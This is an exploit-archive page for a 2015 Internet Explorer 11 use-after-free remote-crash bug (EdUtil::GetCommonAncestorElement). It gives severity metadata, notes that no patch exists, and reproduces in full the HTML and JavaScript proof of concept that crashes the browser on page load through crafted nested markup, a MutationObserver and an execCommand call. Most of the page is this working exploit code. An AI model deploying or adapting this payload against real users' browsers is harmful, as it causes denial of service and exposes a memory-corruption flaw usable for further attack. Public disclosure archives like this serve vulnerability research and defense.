header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Marcin Ressel
7,5
CVSS
HIGH
Remote Crash
416
CWE
Product Name: Internet Explorer
Affected Version From: 11.0.9600.18124
Affected Version To: 11.0.9600.18124
Patch Exists: NO
Related CWE: N/A
CPE: a:microsoft:internet_explorer:11.0.9600.18124
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x64
2015

IE11 EdUtil::GetCommonAncestorElement Remote Crash

A remote crash vulnerability exists in Internet Explorer 11 due to a use-after-free error when handling a specially crafted web page. An attacker can exploit this vulnerability to cause a denial of service condition in the affected application.

Mitigation:

No known mitigation is available at this time.
Source

Exploit-DB raw data:

<!doctype html>
<html>
	<head>
		<meta http-equiv='Cache-Control' content='no-cache'/>
		<title>EdUtil::GetCommonAncestorElement Remote Crash</title>
		<script>
      /*
      * Title : IE11 EdUtil::GetCommonAncestorElement Remote Crash
      * Date : 31.12.2015
      * Author : Marcin Ressel (https://twitter.com/m_ressel)
      * Vendor Hompage : www.microsoft.com
      * Software Link : n/a
      * Version : 11.0.9600.18124
      * Tested on: Windows 7 x64
      */
         		
      var trg,src,arg;
      var range,select,observer;
			function testcase()
			{
			  document.body.innerHTML ='<table><colgroup></colgroup><table><tbody><table><table></table><col></col></table></tbody></table></table><select><option>0]. option</option><option>1]. option</option></select><ul type="circle"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>';
		    var all = document.getElementsByTagName("*"); 
			  trg = all[9];
			  src = all[2]; 
				arg = all[12];
	      select = document.getSelection(); 
			  observer = new MutationObserver(new Function("","range = select.getRangeAt(258);")); 
				select.selectAllChildren(document);
			  document.execCommand("selectAll",false,'<ul type="square"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li><li>4]. li</li><li>5]. li</li><li>6]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>');	
			}
		</script>
	</head>
	<body onload='testcase();'>	
	</body>
</html>

Navigation

Suggest Exploit

Services By CQR